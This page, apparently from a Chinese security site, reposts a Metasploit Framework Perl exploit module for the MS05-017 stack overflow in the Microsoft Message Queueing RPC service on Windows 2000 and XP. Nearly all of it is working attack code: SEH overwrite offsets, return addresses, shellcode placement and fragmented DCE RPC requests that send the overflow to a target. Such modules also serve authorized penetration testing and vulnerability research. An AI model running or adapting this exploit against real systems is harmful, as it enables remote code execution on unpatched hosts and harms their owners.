首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Message Queuing Remote Overflow Exploit (MS05-017)
来源:hdm@metasploit.com 作者:H D Moore 发布时间:2005-05-12  

Microsoft Message Queuing Remote Overflow Exploit (MS05-017)

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::msmq_deleteobject_ms05_017;
use strict;
use base "Msf::Exploit";
use Pex::DCERPC;
use Pex::Text;
use Pex::x86;

my $advanced =
{
'FragSize' => [1024, 'The application fragment size to use with DCE RPC'],
};

my $info =
{
'Name' => 'Microsoft Message Queueing Service MSO5-017',
'Version' => '$Revision: 1.6 $',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com>',
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 1,

'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 2103 ],
'HNAME' => [1, 'DATA', 'The netbios name of the target'],
},

'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'Keys' => ['+ws2ord'],
# sub esp, 4097 + inc esp makes stack happy
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the RPC interface to the Microsoft
Message Queueing service. The offset to the return address changes based on the
length of the system hostname, so this must be provided via the 'HNAME' option.
Much thanks to snort.org and Jean-Baptiste Marchand's excellent MSRPC website.
}),

'Refs' =>
[
[ 'OSVDB', '15458' ],
[ 'CVE', '2005-0059' ],
[ 'MSB', 'MS05-017' ],
],

'DefaultTarget' => 0,
'Targets' =>
[
[ 'Windows 2000 ALL / Windows XP SP0-SP1 (English)', 0x004014e9, 0x01001209 ], # mqsvc.exe
],

'Keys' => ['msmq'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_name = $self->GetVar('HNAME');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $fragsize = $self->GetVar('FragSize') || 2000;

my $target = $self->Targets->[$target_idx];
my ($res, $rpc);

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);

if ($s->IsError) {
$self->PrintLine("[*] Socket error: " . $s->GetError());
return(0);
}


# MSMQ supports three forms of queue names, the two we can use are
# the IP address and the hostname. If we use the IP address via the
# TCP: format, the offset to the SEH frame will change depending on
# the length of the real hostname. For this reason, we force the user
# to supply us with the actual hostname.

# Formats: DIRECT=TCP:IPAddress\QueueName DIRECT=OS:ComputerName\QueueName

my $name = "OS:$target_name";
my $hlen = length($target_name) * 2;

my $quepath = Pex::SMB->NTUnicode("$name\\PRIVATE\$\\");
my $pattern = Pex::Text::EnglishText(4000);

# Windows 2000 SEH offset goes first
substr($pattern, 332 + $hlen + 0, 4, pack('V', $target->[1]));
substr($pattern, 332 + $hlen - 4, 2, "\xeb\x22");

# Windows XP SEH offset goes second
substr($pattern, 368 + $hlen + 0, 4, pack('V', $target->[2]));
substr($pattern, 368 + $hlen - 4, 2, "\xeb\x06");

# Finally the shellcode on the end
substr($pattern, 368 + $hlen + 4, length($shellcode), $shellcode);

if ($self->GetVar('DEBUGME')) {
$self->PrintLine("[*] Switching to the diagnostics request pattern");
$pattern = Pex::Text::PatternCreate(4000);
}

# Append the path to the location and null terminate it
$quepath .= $pattern . "\x00\x00";

# Get the unicode length of this string
my $pathlen = int(length($quepath) / 2);

# Stick the RPC stub header on and set the request length
my $overflow = pack('VVVVVV', 1, 1, 1, 3, 3, 2);
$overflow .= pack('VVV', $pathlen, 0, $pathlen);
$overflow .= $quepath;

# Create our RPC packets for the transaction
my $bind = Pex::DCERPC::Bind(Pex::DCERPC::UUID('MSMQ'), '1.0');
my @pkts = Pex::DCERPC::Request(9, $overflow, $fragsize);

# Bind to the MSMQ interface and send the request as fragments
$self->PrintLine("[*] Attempting to exploit the MSMQ service with ".scalar(@pkts)." frags");
$s->Send($bind);
$res = $self->RecvRPC($s);

# Loop through and send each RPC fragment
foreach my $pkt (@pkts) {
$s->Send($pkt);
}

# Try to read the server response
$res = $self->RecvRPC($s);

# Something bad happened, print it out
if ($res->{'Type'} eq 'fault') {
$self->PrintLine(sprintf("[*] The target replied with RPC fault status 0x%.8x", $res->{'Status'}));
}

if ($res->{'StubData'} eq "\x20\x00\x0e\xc0") {
$self->PrintLine("[*] Request rejected, possibly due to invalid hostname");
return;
}

if ($res->{'StubData'} eq "\x1e\x00\x0e\xc0" || $res->{'StubData'} eq "\x7a\x00\x07\x80") {
$self->PrintLine("[*] The target system does not appear to be vulnerable");
return;
}

if (length($res->{'StubData'})) {
$self->PrintLine("[*] Unknown response received: ".unpack("H*", $res->{'StubData'}));
return;
}

# Wait a couple seconds for the handler to kick in before printing an error
select(undef, undef, undef, 2);

$self->PrintLine("[*] No response received, possible Windows XP SP2 target");
return;
}


sub RecvRPC {
my $self = shift;
my $sock = shift;
my $head = $sock->Recv(10, 10);

# Check the DCERPC header
return if (! $head || length($head) < 10);

# Read the DCERPC body
my $dlen = unpack('v', substr($head, 8, 2));
my $body = $sock->Recv($dlen - 10, 10);
my $resp = Pex::DCERPC::DecodeResponse($head.$body);

return $resp;
}

1;


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MySQL MaxDB Webtool GET Comman
·Linux Kernel binfmt_elf Core D
·Hosting Controller Unauthentic
·Ethereal <= 0.10.10 SIP Dis
·Mozilla Firefox Arbitrary Code
·Gaim Stack Overflow
·Ethereal DistCC Buffer Overflo
·Bakbone Netvault Heap Overflow
·Fusion SBX Password Bypass and
·Apache HTDigest Realm Command
·Ethereal SIP Dissector Overflo
·Linux Kernel ELF Core Dump Pri
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved